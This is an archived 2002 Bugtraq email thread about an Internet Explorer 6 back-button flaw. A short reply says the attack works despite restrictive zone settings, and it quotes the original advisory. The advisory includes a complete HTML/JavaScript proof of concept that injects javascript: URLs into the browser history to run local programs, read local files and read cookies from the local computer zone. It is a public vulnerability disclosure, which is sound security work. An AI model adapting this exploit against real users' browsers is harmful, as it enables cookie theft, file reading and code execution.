Return-Path: <bugtraq-return-4495-bugtraq=darklab.net@securityfocus.com>
Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com [66.38.151.27])
	by darklab.net (8.12.2/8.11.4) with ESMTP id g3H6GH3m022049
	for <bugtraq@darklab.net>; Wed, 17 Apr 2002 02:16:17 -0400
Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19])
	by outgoing.securityfocus.com (Postfix) with QMQP
	id A7F25A3385; Tue, 16 Apr 2002 21:36:05 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4786 invoked from network); 15 Apr 2002 20:16:23 -0000
Message-ID: <7E7BCDD96660D211BA480000F8E78A650505D78E@pmare_exchange.pmare>
From: "Martin, Jeffrey" <jmartin@PMARE.com>
To: "'Andreas Sandblad'" <sandblad@acc.umu.se>, bugtraq@securityfocus.com
Subject: RE: Using the backbutton in IE is dangerous
Date: Mon, 15 Apr 2002 16:17:22 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"

This works even if I add both the res: and javascript: URL types to the
"Restricted Sites" zone with everything disabled. (Added via
HKLM\Software\Microsoft\Windows\Current Version\Internet
Settings\ZoneMap\ProtocolDefaults)

-----Original Message-----
From: Andreas Sandblad [mailto:sandblad@acc.umu.se]
Sent: Sunday, April 14, 2002 4:06 PM
To: bugtraq@securityfocus.com
Subject: Using the backbutton in IE is dangerous



---..---..---..---..---..---..---..---..---..---..---..---..----
Title:      Using the backbutton in IE is dangerous.
Date:       [2002-04-15]
Software:   At least Internet Explorer 6.0.
Tested env: Windows 2000 pro, XP.
Rating:     Medium because user interaction is needed.
Impact:     Read cookies/local files and execute code
            (triggered when user hits the back button).
Patch:      None.
Vendor:     Microsoft contacted 12 Nov 2001, additional
            information given 25 Mar 2002.
Workaround: Disable active scripting or never      _     _
            use the back button.                 o' \,=./ `o
Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---


DESCRIPTION:
============
IE allows urls containing the javascript protocoll in the history list.
Code injected in the url will operate in the same zone/domain as the last
url viewed. The javascript url can be set to trigger when a user presses
the backbutton.

The normal behaviour when a page fails to load is to press the backbutton.
The error page shown by IE is operating in the local computer zone
(res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# on Win2000). Thus, we
can execute code and read local files.


EXPLOIT:
========
The exploit works as follow: Press one of the links and then the back
button.

Note: Exploit has only been tested on fully patched IE 6.0, with Win XP
and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and
test.txt must exist.

--------------------------CUT HERE-------------------------------
<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>

<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
  s+= 'CODEBASE='+file+'></OBJECT>';
  backBug(badUrl,s);
}
function readFile(file){
  s = '<iframe name=i src='+file+' style=display:none onload=';
  s+= 'alert(i.document.body.innerText)></iframe>';
  backBug(badUrl,s);
}
function readCookie(url){
  s = '<script>alert(document.cookie);close();<"+"/script>';
  backBug(url,s);
}
function backBug(url,payload){
  len = history.length;
  page = document.location;
  s = "javascript:if (history.length!="+len+") {";
  s+= "open('javascript:document.write(\""+payload+"\")')";
  s+= ";history.back();} else '<script>location=\""+url
  s+= "\";document.title=\""+page+"\";<"+"/script>';";
  location = s;
}
</script>
</html>
--------------------------CUT HERE-------------------------------


Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


Feedback:
=========
Please send suggestions and comments to:           _     _
sandblad@acc.umu.se                              o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at the University of Umea, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--